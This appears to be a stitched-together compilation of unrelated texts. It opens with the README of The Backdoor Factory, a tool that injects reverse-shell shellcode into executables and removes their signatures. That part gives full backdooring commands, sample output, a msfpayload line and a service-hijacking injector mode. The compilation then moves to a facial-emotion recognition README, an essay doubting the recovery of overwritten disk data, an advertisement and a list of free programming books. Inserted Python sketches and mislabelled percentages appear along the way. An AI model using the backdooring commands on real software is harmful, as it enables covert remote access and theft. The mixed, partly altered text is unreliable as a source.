  -R, --runas_admin     Checks the PE binaries for 'requestedExecutionLevel
                        level="highestAvailable"'. If this string is included
                        in the binary, it must run as system/admin. Doing this
                        slows patching speed significantly.
  -L, --patch_dll       Use this setting if you DON'T want to patch DLLs.
                        Patches by default.
  -F FAT_PRIORITY, --FAT_PRIORITY=FAT_PRIORITY
                        For MACH-O format. If fat file, focus on which arch to
                        patch. Default is x64. To force x86 use -F x86, to
                        force both archs use -F ALL.

Features:

PE Files

Can find all codecaves in an EXE/DLL.
By default, clears the pointer to the PE certificate table, thereby unsigning a binary.
Can inject shellcode into code caves or into a new section.
Can find if a PE binary needs to run with elevated privileges.
When selecting code caves, you can use the following commands:
  -Jump (j), for code cave jumping
  -Single (s), for patching all your shellcode into one cave
  -Append (a), for creating a code cave
  -Ignore (i), nevermind, ignore this binary
Can ignore DLLs.
Import Table Patching

ELF Files

Extends the TEXT SEGMENT by 1000 bytes and injects shellcode into that section of code.

Mach-O Files

Pre-Text Section patching and signature removal

Overall

The user can :
  -Provide custom shellcode.
  -Patch a directory of executables/dlls.
  -Select x32 or x64 binaries to patch only.
  -Include BDF in other Python projects; see pebin.py and elfbin.py

Sample Usage:

Patch an exe/dll using an existing code cave:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory
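
In the cave listing above, each reported size equals the end offset minus the begin offset (for example 0x2e6d0 - 0x2e4d5 = 507). The sketch below shows how such a list of candidate regions could be computed, assuming a cave is simply a run of zero bytes of at least a given length. It is a generic illustration, not BDF's own implementation, and the function name `find_caves` is hypothetical.

```python
def find_caves(data, min_size):
    """Return (begin, end, size) for every run of zero bytes >= min_size.

    `end` is the offset just past the run, so size == end - begin.
    Assumption: a "cave" is a run of 0x00 bytes; this is not BDF's code.
    """
    caves = []
    start = None  # offset where the current zero run began, if any
    for offset, byte in enumerate(data):
        if byte == 0:
            if start is None:
                start = offset
        elif start is not None:
            if offset - start >= min_size:
                caves.append((start, offset, offset - start))
            start = None
    # Handle a zero run that extends to the end of the data.
    if start is not None and len(data) - start >= min_size:
        caves.append((start, len(data), len(data) - start))
    return caves
```

Running it over the raw bytes of a single section, rather than over the whole file, would give per-section results similar in shape to the listing.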

Patch an exe/dll by adding a code section:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch a directory of exes:

./backdoor.py -d test/ -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a
...output too long for README...

User supplied shellcode:

msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

Hunt and backdoor: Injector | Windows Only

The injector module will look for target executables to backdoor on disk.  It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.  
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow 

More info about this project can be found at: https://github.com/secretsquirrel/the-backdoor-factory


Changelog

2/14/2015

I <3 you guys

  • Added Import Address Table patching for PEs to support iat_reverse_tcp payloads that use the import table for winAPI calls. If the binary you are patching does not have LoadLibraryA and GetProcAddress, for example, BDF will patch it in to a new Import Table in a new section. Supports x64/x86 PEs.
  • Added iat_reverse_tcp for x64 PEs.
  • Bug fixes and improvements

1/1/2015

Happy New Year!

Two new OS X payloads! The delay: delay_reverse_shell_tcp

-B 30 --> delay the payload for 30 seconds; the main code runs right away.

Setting of firm capstone commit for building into BDF, capstone ‘Next’ repo breaks BDF.

Fixes to support cython capstone implementation null byte truncation issue

12/27/2014

Added payloadtests.py

This script will output patched files in backdoored that will allow for the user to test the payloads as they wish. Each payload type increments the port used by one.

Usage: payloadtests.py binary HOST PORT

12/17/2014

OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp

-B 15 --> set beacon time for 15 secs

Bug fix to support OS X for BDFProxy

10/11/2014

PE UPX Patching Added

9/26/2014

Mach-O x86/x64 added

x86 IAT payload optimization

7/31/2014

Added support for ARM x32 LE ELF patching

7/22/2014

Added FreeBSD x32 ELF patching support

Change to BSD 3 Clause License

7/13/2014

Incorporated Capstone: http://www.capstone-engine.org/

During the process of adding Capstone, I removed about 500 lines of code. That’s pretty awesome.

Renamed loadliba_reverse_tcp to iat_reverse_tcp.

Small optimizations for speed.

5/30/2014

Added a new win86 shellcode: loadliba_reverse_tcp

More information about this project can be found at: https://github.com/secretsquirrel/the-backdoor-factory

Emotime – Recognizing emotional states in faces


Emotime

Recognizing emotional states in faces


Authors: Luca Mella, Daniele Bellavista

Development Status: Experimental

Copyleft: CC-BY-NC 2013

Project Page: https://github.com/luca-m/emotime


Goal

This project aims to recognize main facial expressions (neutral, anger, disgust, fear, joy, sadness, surprise) in image sequences using the approaches described in:

References

Listed here is some interesting material about machine learning, OpenCV, Gabor transforms and other topics that could be useful for getting into this subject:

Project Structure

src
  \-->dataset        Scripts for dataset management
  \-->facecrop       Utilities and modules for face cropping and registration
  \-->gaborbank      Utilities and modules for generating gabor filters and image filtering
  \-->adaboost       Utilities and modules for adaboost train, prediction, and feature selection
  \-->svm            Utilities and modules for svm training and prediction
  \-->detector       Multiclass detector and preprocessor
  \-->utils          String and IO utilities, CSV support, and so on
doc                  Documentation (doxygen)
report               Class project report (latex)
resources            Third party resources (e.g. OpenCV haar classifiers)
assets               Binary folder
test                 Some testing scripts

Build

Dependencies:

  • CMake >= 2.8
  • Python >= 2.7, < 3.0
  • OpenCV >= 2.4.5

Compiling on linux:

  • mkdir build
  • cd build
  • cmake .. ; make ; make install – now the assets folder should be populated

Cross-compiling for windows:

  • Using CMake or CMakeGUI, select emotime as source folder and configure.
  • If it complains about the variable OpenCV_DIR, set it to the appropriate path so that:
    • C:/path/to/opencv/dir/ contains the libraries (*.lib)
    • C:/path/to/opencv/dir/include contains the include directories (opencv and opencv2)
    • If the include directory is missing, the project will likely fail to compile because of missing references to opencv2/opencv or similar.
  • Then generate the project and compile it.
  • This was tested with Visual Studio 12 64 bit.

Detection and Prediction

Proof-of-concept models trained on faces extracted with the cbcl1 detector are available for download; models for both the 1 vs all and the many vs many multiclass strategies are provided.

NOTE: watch the illumination! At the moment, the best results in live webcam sessions are obtained with direct light on the user’s face. Don’t worry, you are not required to blind yourself with a headlight.

If you’d like to try emotime without any further complication, take a look at the x86_64 release.

Usage

Video gui:

echo "VIDEOPATH" | ./emotimevideo_cli FACEDETECTORXML (EYEDETECTORXML|none) WIDTH HEIGHT NWIDTHS NLAMBDAS NTHETAS (svm|ada) (TRAINEDCLASSIFIERSXML)+

Cam gui:

./emotimegui_cli FACEDETECTORXML (EYEDETECTORXML|none) WIDTH HEIGHT NWIDTHS NLAMBDAS NTHETAS (svm|ada) (TRAINEDCLASSIFIERSXML)+

Or using the python script:

python gui.py --cfg <dataset_configuration_path> --mode svm --eye-correction <dataset_path>
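
The NWIDTHS, NLAMBDAS and NTHETAS arguments in the commands above size the Gabor filter bank. As a rough illustration only, the sketch below builds one kernel per (width, wavelength, orientation) combination using the textbook real-valued Gabor formula in pure Python. The concrete kernel sizes, wavelengths, the sigma rule and the idea that the bank is a full Cartesian product are assumptions made for this example, not values taken from emotime.

```python
import math


def gabor_kernel(size, lam, theta, sigma=None, gamma=1.0, psi=0.0):
    """Real part of a Gabor filter, returned as a size x size list of rows."""
    if sigma is None:
        sigma = 0.5 * lam  # hypothetical rule tying the envelope to the wavelength
    half = size // 2
    rows = []
    for y in range(-half, half + 1):
        row = []
        for x in range(-half, half + 1):
            # Rotate the coordinates by the filter orientation.
            xr = x * math.cos(theta) + y * math.sin(theta)
            yr = -x * math.sin(theta) + y * math.cos(theta)
            envelope = math.exp(-(xr * xr + (gamma * yr) ** 2) / (2.0 * sigma * sigma))
            carrier = math.cos(2.0 * math.pi * xr / lam + psi)
            row.append(envelope * carrier)
        rows.append(row)
    return rows


def gabor_bank(nwidths, nlambdas, nthetas):
    """One kernel per (width, wavelength, orientation) combination."""
    widths = [7 + 2 * i for i in range(nwidths)]          # assumed odd kernel sizes
    lambdas = [4.0 + 2.0 * i for i in range(nlambdas)]    # assumed wavelengths in pixels
    thetas = [math.pi * i / nthetas for i in range(nthetas)]
    return [(w, lam, th, gabor_kernel(w, lam, th))
            for w in widths for lam in lambdas for th in thetas]


bank = gabor_bank(3, 5, 4)  # same counts as the "3 5 4" example invocation
print(len(bank), "kernels")
```

Under these assumptions the number of filters, and therefore the size of the feature vector per face, grows as the product of the three counts, which is why tuning them trades accuracy against real-time performance.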

Binary Release and Trained Models

If you just want to take a quick look at the project, we strongly suggest going to the release section and downloading the compiled binaries for 64-bit Linux, then:

  • download and unzip the binaries in an empty folder
  • run ./download_trained_models.sh
  • Then cd assets and ./emotimegui_cli ../resources/haarcascade_frontalface_cbcl1.xml none 48 48 3 5 4 svm ../dataset_svm_354_cbcl1_1vsallext/classifiers/svm/*

Training

After mkdir build; cd build; cmake ..; make ; make install go to the assets folder and:

  1. Initialize a dataset using:
    python datasetInit.py -cfg <CONFIGFILE> <EMPTY_DATASET_FOLDER>
    
  2. Then fill it with your images or use the Cohn-Kanade importing script:
    python datasetFillCK --cfg <CONFIGFILE> <DATASETFOLDER> <CKFOLDER> <CKEMOTIONFOLDER>
    
  3. Now you are ready to train models:
    python train_models.py --cfg <CONFIGFILE> --mode svm --prep-train-mode [1vsall|1vsallext] <DATASETFOLDER>
    

Dataset

The Cohn-Kanade database is one of the most widely used face databases. Its extended version (CK+) also contains FACS code labels (aka Action Units) and emotion labels (neutral, anger, contempt, disgust, fear, happy, sadness, surprise).

Validation

This is a first, rough evaluation of the performance of the system. The validation tests involved the whole system (face detector + emotion classifier), so the results should not be attributed to the emotion classifier alone.

Of course, a finer validation should be carried out in order to evaluate the emotion classifier alone. For the sake of completeness, the reader should know that the cbcl1 face model is a good face locator rather than a detector: roughly speaking, it detects fewer faces but is more precise.

The following results are annotated with my personal, totally informal, evaluation after live webcam sessions.

multiclass method: 1vsAllExt
face detector:     cbcl1
eye correction:    no 
width:             48
height:            48 
nwidths:           3 
nlambdas:          5
nthetas:           4

Sadness                   <-- Not good in live webcam sessions too
  sadness -> 0.67%
  surprise -> 0.17%
  anger -> 0.17%
Neutral                   <-- Good in live webcam sessions
  neutral -> 0.90%
  contempt -> 0.03%
  anger -> 0.03%
  fear -> 0.02%
  surprise -> 0.01%
Disgust                   <-- Good in live webcam sessions
  disgust -> 1.00%
Anger                     <-- Good in live webcam sessions
  anger -> 0.45%
  neutral -> 0.36%
  disgust -> 0.09%
  contempt -> 0.09%
Surprise                  <-- Good in live webcam sessions
  surprise -> 0.94%
  neutral -> 0.06%
Fear                      <-- Almost Good in live webcam sessions
  fear -> 0.67%
  surprise -> 0.17%
  happy -> 0.17%
Contempt                  <-- Not good in live webcam sessions
  neutral -> 0.50%
  contempt -> 0.25%
  anger -> 0.25%
Happy                     <-- Good in live webcam sessions
  happy -> 1.00%

multiclass method: 1vsAll
face detector:     cbcl1
eye correction:    no 
width:             48
height:            48 
nwidths:           3 
nlambdas:          5
nthetas:           4

Sadness                   <-- Not good in live webcam sessions too
  unknown -> 0.50%
  sadness -> 0.33%
  fear -> 0.17%
Neutral                   <-- Good in live webcam sessions 
  neutral -> 0.73%
  unknown -> 0.24%
  surprise -> 0.01%
  fear -> 0.01%
  contempt -> 0.01%
Disgust                   <-- Good in live webcam sessions
  disgust -> 0.82%
  unknown -> 0.18%
Anger                     <-- Almost sufficient in live webcam sessions
  anger -> 0.36%
  neutral -> 0.27%
  unknown -> 0.18%
  disgust -> 0.09%
  contempt -> 0.09%
Surprise                  <-- Good in live webcam sessions
  surprise -> 0.94%
  neutral -> 0.06%
Fear                      <-- Sufficient in live webcam sessions
  fear -> 0.67%
  surprise -> 0.17%
  happy -> 0.17%
Contempt                  <-- Not good in live webcam sessions too
  unknown -> 1.00%
Happy                     <-- Good in live webcam sessions 
  happy -> 1.00%

The main differences between the 1vsAll and 1vsAllExt modes observed in live webcam sessions relate to the number of unknown states registered and the stability of the detected states. In detail, the 1vsAll multiclass method provides less noisy detections during a live webcam session, while the 1vsAllExt mode always predicts a valid state for each processed frame but is sometimes more unstable during expression transitions.

Sorry for the lack of fine tuning and detail, but it is a spare-time project at the moment. If you have any ideas or suggestions, feel free to write to us!
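
To compare the two modes at a glance, the per-class figures from the tables above can be summarised in a few lines of Python. This is only a reading aid: it treats the reported values as fractions (1.00 meaning every sample of that class), takes an unweighted average because the number of samples per class is not given, and uses helper and variable names that are purely illustrative.

```python
# Fraction of samples of each class that was labelled correctly,
# copied from the two result tables above.
correct_1vsallext = {
    "sadness": 0.67, "neutral": 0.90, "disgust": 1.00, "anger": 0.45,
    "surprise": 0.94, "fear": 0.67, "contempt": 0.25, "happy": 1.00,
}
correct_1vsall = {
    "sadness": 0.33, "neutral": 0.73, "disgust": 0.82, "anger": 0.36,
    "surprise": 0.94, "fear": 0.67, "contempt": 0.00, "happy": 1.00,
}
# Fraction of samples of each class that 1vsAll labelled "unknown".
# 1vsAllExt reports no unknown states in its table.
unknown_1vsall = {
    "sadness": 0.50, "neutral": 0.24, "disgust": 0.18, "anger": 0.18,
    "surprise": 0.00, "fear": 0.00, "contempt": 1.00, "happy": 0.00,
}


def macro_average(per_class):
    """Unweighted mean over classes (class sizes are not known here)."""
    return sum(per_class.values()) / len(per_class)


print("1vsAllExt mean correct: %.3f" % macro_average(correct_1vsallext))
print("1vsAll    mean correct: %.3f" % macro_average(correct_1vsall))
print("1vsAll    mean unknown: %.3f" % macro_average(unknown_1vsall))
```

Because the average is unweighted, rare classes such as contempt count as much as neutral, so the summary should be read alongside the informal live-session comments rather than instead of them.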

Further Development

  • Tuning GaborBank parameters for accuracy enhancement.
  • Tuning image sizes for better real-time performance.
  • Better handling of illumination; detections are good when frontal light is in place (keep this in mind when you use it with your camera).

More info about this project can be found at: https://github.com/luca-m/emotime

Can Intelligence Agencies Read Overwritten Data?


Can Intelligence Agencies Read Overwritten Data? A response to Gutmann.

A German translation here

Claims that intelligence agencies can read overwritten data on disk drives have been commonplace for many years now. The most commonly cited source of evidence for this supposed fact is a paper (Secure Deletion of Data from Magnetic and Solid-State Memory) by Peter Gutmann presented at a 1996 Usenix conference. I found this an extraordinary claim, and therefore deserving of extraordinary proof. Thanks to an afternoon at the Harvard School of Applied Science library I have had a chance to examine the paper (http://www.usenix.org/publications/library/proceedings/sec96/full_papers/gutmann/index.html ) and many of the references contained therein.

Of course, modern operating systems can leave copies of “deleted” files scattered in unallocated sectors, temporary directories, swap files, remapped bad blocks, etc, but Gutmann believes that an overwritten sector can be recovered under examination by a sophisticated microscope and this claim has been accepted uncritically by numerous observers. I don’t think these observers have followed up on the references in Gutmann’s paper, however.

Gutmann explains that when a 1 bit is written over a zero bit, the “actual effect is closer to obtaining a .95 when a zero is overwritten with a one, and a 1.05 when a one is overwritten with a one”. Given that, and a read head 20 times as sensitive as the one in a production disk drive, and also given the pattern of overwrite bits, one could recover the under-data.
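
The idealised model in that quotation can be played with in a few lines of Python. The sketch below is a toy, not a model of any real drive: the 0.95 and 1.05 levels come from the quotation, the mirrored levels for an overwriting zero (-0.05 and 0.05) are an assumption, and the Gaussian read noise parameter `noise_sigma` is a hypothetical stand-in for how sensitive the read head is.

```python
import random


def written_level(old_bit, new_bit, residue=0.05):
    """Analog level after new_bit is written over old_bit.

    Gives 0.95 for a one over a zero and 1.05 for a one over a one, as in
    the quotation; the levels for an overwriting zero are assumed symmetric.
    """
    return new_bit + residue * (2 * old_bit - 1)


def recover_old_bits(levels, new_bits):
    """Guess the under-data: a level above nominal suggests an old one."""
    return [1 if level > new_bit else 0 for level, new_bit in zip(levels, new_bits)]


def recovery_accuracy(n_bits, noise_sigma, seed=0):
    """Fraction of old bits guessed correctly under Gaussian read noise."""
    rng = random.Random(seed)
    old = [rng.randint(0, 1) for _ in range(n_bits)]
    new = [rng.randint(0, 1) for _ in range(n_bits)]
    levels = [written_level(o, n) + rng.gauss(0.0, noise_sigma)
              for o, n in zip(old, new)]
    guesses = recover_old_bits(levels, new)
    return sum(g == o for g, o in zip(guesses, old)) / n_bits


for sigma in (0.0, 0.01, 0.05, 0.2):
    print("noise sigma %.2f -> accuracy %.3f" % (sigma, recovery_accuracy(10000, sigma)))
```

In this toy, recovery is perfect only when the measurement noise is well below the 0.05 residue; once the noise is comparable to or larger than the residue, the guesses drift towards coin flips. Whether any real instrument reaches the noise-free regime on a real platter is exactly the question the rest of this note examines.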

The references Gutmann provides suggest that his piece is much overwrought. None of the references lead to examples of sensitive information being disclosed. Rather, they refer to experiments where STM microscopy was used to examine individual bits, and some evidence of previously written bits was found.

There is a large literature on the use of Magnetic Force Scanning Tunneling Microscopy (MFM or STM) to image bits recorded on magnetic media. The apparent point of this literature is not to retrieve overwritten data, but to test and improve the design of drive read/write heads. Two of the references (Rugar et al, Gomez et al) had pictures of overwritten bits, showing parts of the original data clearly visible in the micro-photograph. These were considered by the authors as examples of sub-optimal head design. The total number of bits seen was 6 in one photo and 8 in the other. Neither photo-micrograph was a total success, because in one case only transitions from one to zero were visible, and in the other case one of the transitions was ambiguous. Nevertheless, I accept that overwritten bits might be observable under certain circumstances.

So I can say that Gutmann doesn’t cite anyone who claims to be reading the under-data in overwritten sectors, nor does he cite any articles suggesting that ordinary wipe-disk programs wouldn’t be completely effective.

I should qualify that last paragraph a “bit”. I was unable to locate a copy of the master’s thesis with the tantalizing title “Detection of Digital Information from Erased Magnetic Disks” by Venugopal Veeravalli. However, a brief visit to his web page shows that this was never published, that he has never published on this or a related topic (his field is security of mobile communications), and that his other work does not suggest familiarity with STM microscopes. So I am fairly sure he didn’t design a machine to read under-data with an “unwrite” system call. In an email message to me Dr. Veeravalli said that his work was theoretical, and studied the possibility of using DC erase heads. [Since writing this paragraph the paper has been posted. It is indeed theoretical but has quantitative predictions about the possibility of recovering data with varying degrees of erasure. There isn’t any suggestion that ordinary erase procedures would be inadequate.]

Gutmann claims that “Intelligence organisations have a lot of expertise in recovering these palimpsestuous images.” but there is no reference for that statement. There are 18 references in the paper, but none of the ones I was able to locate even referred to that possibility. Subsequent articles by diverse authors do make that claim, but only cite Gutmann, so they do not constitute additional evidence for his claim.

Gutmann mentions that after a simple setup of the MFM device, bits start flowing within minutes. This may be true, but the bits he refers to are not from disk files, but pixels in the pictures of the disk surface. Charles Sobey has posted an informative paper “Recovering Unrecoverable Data” with some quantitative information on this point. He suggests that it would take more than a year to scan a single platter with recent MFM technology, and tens of terabytes of image data would have to be processed.

In one section of the paper Gutmann suggests overwriting with 4 passes of random data. That is apparently because he anticipates using pseudo-random data that would be known to the investigator. A single write is sufficient if the overwrite is truly random, even given an STM microscope with far greater powers than those in the references. In fact, data written to the disk prior to the data whose recovery is sought will interfere with recovery just as much as data written after – the STM microscope can’t tell the order in which magnetic moments are created. It isn’t like ink, where later applications are physically on top of earlier markings.

After posting this information to a local mailing list, I received a reply suggesting that the recovery of overwritten data was an industry, and that a search on Google for “recover overwritten data” would turn up a number of firms offering this service commercially. Indeed it does turn up many firms, but all but one are quite explicit that they can recover “overwritten files”, which is quite a different matter. An overwritten file is one whose name has been overwritten, not its sectors. Likewise, partitioning, formatting, and “Ghosting” typically affect only a small portion of the physical disk, leaving plenty of potential for sector reads to reveal otherwise hidden data. There is no implication in the marketing material that these firms can read physically overwritten sectors. The one exception I found (Dataclinic in the UK) did not respond to an email enquiry, and they do not mention any STM facility on their web site.

A letter from an Australian homicide investigator confirms my view that even police agencies have no access to the technology Gutmann describes.

Of course it has been several years since Gutmann published. Perhaps microscopes have gotten better? Yes, but data densities have gotten higher too. An hour on the web this month looking at STM sites failed to come up with a single laboratory claiming it had an ability to read overwritten data.

Recently I was sent a fascinating piece by Wright, Kleiman and Sundhar (2008) who show actual data on the accuracy of recovered image data. While the images include some information about underlying bits, the error rate is so high that it is difficult to imagine any use for the result. While the occasional word might be recovered out of thousands, the vast majority of apparently recovered words would be spurious.
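
The jump from a per-bit error rate to “the occasional word out of thousands” is simple arithmetic. As a sketch, assuming bit errors are independent and that a word is stored as 8-bit characters, the chance of recovering a whole word is the per-bit accuracy raised to the number of bits in the word. The per-bit accuracies used below are hypothetical illustrations, not figures taken from Wright, Kleiman and Sundhar.

```python
def word_recovery_probability(bit_accuracy, n_chars, bits_per_char=8):
    """Chance that every bit of an n_chars-long word is recovered correctly,
    assuming each bit is recovered independently with the same accuracy."""
    return bit_accuracy ** (n_chars * bits_per_char)


# Hypothetical per-bit accuracies, applied to a five-character word (40 bits).
for accuracy in (0.6, 0.9, 0.99):
    p = word_recovery_probability(accuracy, 5)
    print("bit accuracy %.2f -> word recovered with probability %.6f" % (accuracy, p))
```

Even a per-bit accuracy that sounds high collapses quickly over 40 bits, which is why a recovered image that “includes some information about underlying bits” can still be useless for reading files.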

Another fact to ponder is the failure of anyone to read the “18 minute gap” Rose Mary Woods created on the tape of Nixon discussing the Watergate break-in. In spite of the fact that the data density on an analog recorder of the 1960s was approximately one million times less than that of current drive technology, and that audio recovery would not require a high degree of accuracy, not one phoneme has been recovered.

The requirement of military forces and intelligence agencies that disk drives with confidential information be destroyed rather than erased is sometimes offered as evidence that these agencies can read overwritten data. I expect the real explanation is far more prosaic. The technician tasked with discarding a hard drive may or may not have enough computer knowledge to know if running the command “urandom >/dev/sda2c1” has covered an entire disk with random data, or only one partition, nor is it easy to confirm that it was done. How would you confirm that the overwrite was not pseudo-random? Smashing the drive with a sledgehammer is easy to do, easy to confirm, and very hard to get wrong. The GPL’ed package DBAN is an apparent attempt to address this uncertainty without destroying hardware. Hardware appliances with similar aims include the Drive Erazer and the Digital Shredder.

Surveying all the references, I conclude that Gutmann’s claim belongs in the category of urban legend.

Or it may be in the category of marketing hype. I note that it is being used to sell a software package called “The Annililator”.

Since writing the above, I have noticed a comment attributed to Gutmann conceding that overwritten sectors on “modern” (post 2003?) drives can not be read by the techniques outlined in the 1996 paper, but he does not withdraw the overwrought claims of the paper with respect to older drives.

An updated copy of this memo will be kept at http://www.nber.org/sys-admin/overwritten-data-gutmann.html. Additional information may be sent to feenberg at nber dot org.

Daniel Feenberg
National Bureau of Economic Research
Cambridge MA
USA
21 July 2003
24 March 2004 (revised)
22 April 2004 (revised)
14 May 2004 (revised)
1 Oct 2011 (correction)
1 Jan 2013 (corrections)

“Magnetic force microscopy: General principles and application to longitudinal recording media”, D.Rugar, H.Mamin, P.Guenther, S.Lambert, J.Stern, I.McFadyen, and T.Yogi, Journal of Applied Physics, Vol.68, No.3 (August 1990), p.1169.

“Magnetic Force Scanning Tunnelling Microscope Imaging of Overwritten Data”, Romel Gomez, Amr Adly, Isaak Mayergoyz, Edward Burke, IEEE Trans.on Magnetics, Vol.28, No.5 (September 1992), p.3141.

Wright, C.; Kleiman, D, & Sundhar S. R. S.: (2008) “Overwriting Hard Drive Data: The Great Wiping Controversy”. ICISS 2008: 243-257 http://portal.acm.org/citation.cfm?id=1496285 or http://www.vidarholen.net/~vidar/overwriting_hard_drive_data.pdf . See also a summary at http://sansforensics.wordpress.com/2009/01/15/overwriting-hard-drive-data/

Free Trade Magazine Subscriptions & Technical Document Downloads


Browse through our extensive list of free Information Technology magazines, white papers, downloads and podcasts to find the titles that best match your skills; topics include technology, IT management, business technology and e-business. Simply complete the application form and submit it. All are absolutely free to professionals who qualify.

http://cybrary-it.tradepub.com

List of Free Learning Resources


Intro:
If you want to find a learning resource, you should definitely check out our site, Free Learning Resources (http://resrc.io). And for those who want to learn a computer language, you should check out these books on reSRC.io (http://resrc.io/list/10/list-of-free-programming-books) or on github (https://github.com/vhf/free-programming-books/blob/master/free-programming-books.md). This list initially was a clone of stackoverflow – List of Freely Available Programming Books (http://stackoverflow.com/questions/194812/list-of-freely-available-programming-books/392926#392926) by George Stocker. Now updated, with dead links gone and new content.

Moved to GitHub for collaborative updating and for the site mentioned above.
NEW : Search inside free-programming-books.md (and a whole lot more of learning resources) Try it out at http://resrc.io/search

Free Courses (https://github.com/vhf/free-programming-books/blob/master/free-courses-en.md):

Assembly

Android

AngularJS

C

C++

Clojure

Databases

Haskell

HTML / CSS

iOS

Java

JS

MATLAB

Misc

OCaml

Oracle PL/SQL

Python

Ruby

Scala

Swift

Web Development

Free Podcasts and Screencasts (https://github.com/vhf/free-programming-books/blob/master/free-podcasts-screencasts-en.md):

Free Programming books (https://github.com/vhf/free-programming-books/blob/master/free-programming-books.md):
Original Contribution by George Stocker on Stack Overflow
Original Source: Free Programming books

Meta Lists

Graphics Programming

Graphical User Interfaces

Language Agnostic

Algorithms & Data Structures

Cellular Automata

Cloud Computing

Compiler Design

Computer Vision

Database

Datamining

Information Retrieval

Licensing

Machine Learning

Mathematics

Mathematics For Computer Science

Misc

MOOC

Networking

Open Source Ecosystem

Operating systems

Parallel Programming

Partial Evaluation

Professional Development

Programming Paradigms

Regular Expressions

Reverse Engineering

Security

Software Architecture

Standards

Theoretical Computer Science

Web Performance

Ada

Agda

Alef

Android

APL

Arduino

ASP.NET MVC

Assembly Language

Non-X86

AutoHotkey

Autotools

Awk

Bash

Basic

BETA

C

C Sharp

C++